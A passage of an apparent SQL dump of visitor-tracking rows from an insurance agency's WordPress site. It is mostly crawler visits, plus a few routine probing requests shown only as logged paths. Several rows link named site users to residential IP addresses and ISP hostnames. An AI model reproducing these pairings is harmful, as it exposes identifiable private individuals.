http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(5723,'0b_2d39505804baacbf5e2ed2462c23cb5d','1458172936','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5726,'0b_abc7730cfdce095361bc4eb6571eab8b','1458172939','65.55.210.138','msnbot-65-55-210-138.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(5727,'0b_6e49854b6b2109db9860e7cc4c210917','1458173038','192.3.151.134','192.3.151.134','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(5730,'0b_928498af8649df78567f812c74bcdaf3','1458173048','72.51.45.39','bandicoot.hyakdev.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(5732,'0b_82e446605a09c4568c0055e8a6166a25','1458173099','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5735,'0b_82e446605a09c4568c0055e8a6166a25','1458173119','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5738,'0b_82e446605a09c4568c0055e8a6166a25','1458173172','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5741,'0b_82e446605a09c4568c0055e8a6166a25','1458173172','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5744,'0b_3b11eb47d3213a182dafdd5a1ac67e4d','1458173748','23.239.224.1','23.239.224.1','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1920 x 1080','','','','','','0','0',0),(5745,'0b_e96663596b18a23b95a5200837d2be10','1458175496','180.76.15.137','baiduspider-180-76-15-137.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(5748,'0b_92ed2985b5e553d16629a5d58e26cfdd','1458176917','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(5750,'0b_92ed2985b5e553d16629a5d58e26cfdd','1458176919','144.76.7.107','mj2.naefmarco.ch','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(5753,'0b_a5b9b90e6136160aad13f6f8b21c767b','1458177313','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(5756,'0b_a5b9b90e6136160aad13f6f8b21c767b','1458177314','178.255.215.70','crawl06.exabot.com','/agent-tools/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(5757,'0b_8d04c6644be93317d78f6069995108b0','1458178499','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5759,'0b_9a07769cacedc37f781f49bb049f0f56','1458179660','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5760,'0b_5b881735a8c66e6df8903ea313425aa3','1458181753','45.35.92.160','unassigned.psychz.net','/carriers/','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 35','us','','','','','','','0','0',0),(5762,'0b_8e4873b3c420c4d4ca7336b167b6e0a1','1458181996','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5765,'0b_1f9ba5cf32e4a3cf96fcc5564c758c69','1458182286','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(5768,'0b_1f9ba5cf32e4a3cf96fcc5564c758c69','1458182288','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(5769,'0b_1f9ba5cf32e4a3cf96fcc5564c758c69','1458182304','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(5772,'0b_1f9ba5cf32e4a3cf96fcc5564c758c69','1458182368','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(5774,'0b_149dfa2bc068e4b4bc35f05e002747ca','1458183167','45.79.129.135','li1228-135.members.linode.com','/','Wget/1.15 (linux-gnu)','','',0,'','Wget 1','','','','Wget','','','','0','0',0),(5777,'0b_211cccf5787e1b3ecbfc11acfcbfd953','1458183844','37.57.0.201','201.0.57.37.triolan.net','/?author=1','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36','','',0,'WinXP','Chrome 34','','','','','','','','0','0',0),(5780,'0b_aed8b1357b3b7fc189a7fe6fa8885abc','1458186284','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(5781,'0b_d5a1fad42cfb0ae6f6a7f1ea42ea249c','1458186301','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(5784,'0b_549ed84b787796f24a77c236f566f100','1458186856','46.4.87.105','static.105.87.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5786,'0b_549ed84b787796f24a77c236f566f100','1458186858','46.4.87.105','static.105.87.4.46.clients.your-server.de','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5787,'0b_549ed84b787796f24a77c236f566f100','1458186859','46.4.87.105','static.105.87.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5790,'0b_549ed84b787796f24a77c236f566f100','1458186861','46.4.87.105','static.105.87.4.46.clients.your-server.de','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5792,'0b_549ed84b787796f24a77c236f566f100','1458186863','46.4.87.105','static.105.87.4.46.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5795,'0b_549ed84b787796f24a77c236f566f100','1458186866','46.4.87.105','static.105.87.4.46.clients.your-server.de','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5796,'0b_549ed84b787796f24a77c236f566f100','1458186868','46.4.87.105','static.105.87.4.46.clients.your-server.de','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5798,'0b_127137b48072ca5b1423167d6b54b8b4','1458189137','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5801,'0b_ff51ce5d699edb582b4540205d9c1914','1458190826','195.22.127.196','195.22.127.196','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36','','',0,'WinXP','Chrome 41','us','','','','','','','0','0',0),(5802,'0b_e83c627f1b0da426e57b57a7302c998d','1458191248','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5805,'0b_3ca64663e15e90a9ca00a0c75a01b914','1458191996','198.211.25.106','106-25-211-198-dedicated.multacom.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(5808,'0b_10d855d61a0170f18d6ef4750db75722','1458192670','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5810,'0b_9c9160ee54cda3ed535d5c7358b73b5f','1458192726','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5813,'0b_9c9160ee54cda3ed535d5c7358b73b5f','1458192806','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(5816,'0b_5a8873d0e3fec235c21859f0b7430998','1458197437','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5817,'0b_27e197501fb2b3e5efd621447e00aea5','1458201960','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/home/feed/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(5820,'0b_6d38755b8c506a6620736822d870ceea','1458203969','180.76.15.157','baiduspider-180-76-15-157.crawl.baidu.com','/feed/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(5823,'0b_24bb4dd62b0ea485948e8f3457b85ee7','1458205446','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5826,'0b_61faa43fd9c5fb3f2da0ff83a930cccd','1458205650','204.152.214.34','204.152.214.34.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(5828,'0b_b87e08ef200ef94010a080f76259a806','1458206458','52.11.252.29','ec2-52-11-252-29.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5829,'0b_b87e08ef200ef94010a080f76259a806','1458206458','52.11.252.29','ec2-52-11-252-29.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5831,'0b_b87e08ef200ef94010a080f76259a806','1458206460','52.11.252.29','ec2-52-11-252-29.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5832,'0b_b87e08ef200ef94010a080f76259a806','1458206500','52.11.252.29','ec2-52-11-252-29.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5834,'0b_b87e08ef200ef94010a080f76259a806','1458206502','52.11.252.29','ec2-52-11-252-29.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5835,'0b_f30bead3efa41bde5e2ed5b332ed0e6e','1458209842','52.37.181.200','ec2-52-37-181-200.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5838,'0b_f30bead3efa41bde5e2ed5b332ed0e6e','1458209868','52.37.181.200','ec2-52-37-181-200.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5840,'0b_f30bead3efa41bde5e2ed5b332ed0e6e','1458209910','52.37.181.200','ec2-52-37-181-200.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5843,'0b_f30bead3efa41bde5e2ed5b332ed0e6e','1458209911','52.37.181.200','ec2-52-37-181-200.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5844,'0b_d41daf20115ed9c0cf72a7a846051fe5','1458216766','180.76.15.136','baiduspider-180-76-15-136.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(5847,'0b_884afaa00b13033df40bbd883ea33564','1458219365','52.26.162.78','ec2-52-26-162-78.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5850,'0b_884afaa00b13033df40bbd883ea33564','1458219374','52.26.162.78','ec2-52-26-162-78.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5852,'0b_884afaa00b13033df40bbd883ea33564','1458219437','52.26.162.78','ec2-52-26-162-78.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5853,'0b_884afaa00b13033df40bbd883ea33564','1458219438','52.26.162.78','ec2-52-26-162-78.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5855,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458220325','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5858,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458220327','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5859,'0b_e0885a0e4acaf8be5adad95a17d89f9d','1458220417','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5862,'0b_e0885a0e4acaf8be5adad95a17d89f9d','1458220418','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5865,'0b_ff9346bdcf36d979ceb6720811e5af0b','1458221351','54.229.174.179','ec2-54-229-174-179.eu-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','http://www.empireins.com','',0,'Win7','Chrome 46','us','','','','','','','0','0',0),(5868,'0b_8c7af04b9167f5f7784069099ddcebed','1458223157','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1366 x 768','Google','','','','','0','0',0),(5871,'0b_32ac9661b9fe8eb9cc1bb53061018e26','1458223161','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(5874,'0b_8c7af04b9167f5f7784069099ddcebed','1458223163','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(5877,'0b_8c7af04b9167f5f7784069099ddcebed','1458223189','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(5880,'0b_8c7af04b9167f5f7784069099ddcebed','1458223200','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','51',0),(5882,'0b_8c7af04b9167f5f7784069099ddcebed','1458223201','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','0',0),(5883,'0b_8c7af04b9167f5f7784069099ddcebed','1458223226','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','51',0),(5885,'0b_8c7af04b9167f5f7784069099ddcebed','1458223228','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/register/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1366 x 768','','','','','','0','51',0),(5886,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458223301','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5888,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458223302','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5889,'0b_38f0d58cba655b48582e45011b082cad','1458223814','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/user-edit.php?user_id=195','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(5892,'0b_cf0f34b02c47853c142ac31fe9cb5f96','1458224482','65.37.85.151','65-37-85-151.nrp2feld.roc.ny.frontiernet.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','us','','','','','','','0','0',0),(5895,'0b_cf0f34b02c47853c142ac31fe9cb5f96','1458224484','65.37.85.151','65-37-85-151.nrp2feld.roc.ny.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 48','us','','','','','','','0','0',0),(5898,'0b_a796cd8723ece5fc136f9f0afc03f294','1458224754','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5900,'0b_025b555fa354b7090d2b5c378affce90','1458224959','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(5901,'0b_e1b3e663868869493486f686f5c70525','1458224960','66.249.73.187','crawl-66-249-73-187.googlebot.com','/members/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(5904,'0b_f827d33a36fc736986b563403b44ec4a','1458225995','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/register/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/register/','',0,'Win10','Chrome 49','us','1366 x 768','','','','yoel shtesl','','0','0',0),(5907,'0b_f827d33a36fc736986b563403b44ec4a','1458226008','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/register/','',0,'Win10','Chrome 49','us','1366 x 768','','','','yoel shtesl','','0','51',0),(5909,'0b_f827d33a36fc736986b563403b44ec4a','1458226008','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','yoel shtesl','','0','0',0),(5912,'0b_f827d33a36fc736986b563403b44ec4a','1458226022','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','yoel shtesl','','0','0',0),(5913,'0b_f827d33a36fc736986b563403b44ec4a','1458226030','108.21.117.110','pool-108-21-117-110.nycmny.east.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1366 x 768','','','','yoel shtesl','','0','51',0),(5916,'0b_bb1ec76b3907738bcf24fab384af1930','1458226774','199.168.151.159,75.99.93.114','ool-4b635d72.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(5919,'0b_bb1ec76b3907738bcf24fab384af1930','1458226777','199.168.151.159,75.99.93.114','ool-4b635d72.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5921,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227078','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5922,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227081','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5924,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227082','69.175.67.58','newscan04.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5927,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227084','69.175.67.58','newscan04.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5930,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227086','69.175.67.58','newscan04.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 